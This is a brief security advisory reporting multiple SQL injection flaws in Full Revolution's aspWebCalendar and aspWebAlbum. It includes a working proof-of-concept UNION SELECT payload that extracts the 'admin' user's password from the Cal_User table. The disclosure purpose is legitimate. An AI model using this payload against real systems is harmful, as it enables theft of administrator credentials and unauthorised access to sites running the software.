Full Revolution aspWebCalendar and aspWebAlbum Multiple SQL Injection Vulnerabilities

Full Revolution aspWebCalendar and aspWebAlbum Multiple SQL Injection Vulnerabilities

No exploit is required to leverage this issue. The following proof of concept exploits have been provided:

Entering the following text into an offending field or passing it through an offending parameter will yield the administrator password and present it to the attacker:

' union select Cal_User_Password,1,1,1,1,1,1,1,1,1 from Cal_User where
Cal_User_UserName = 'admin'--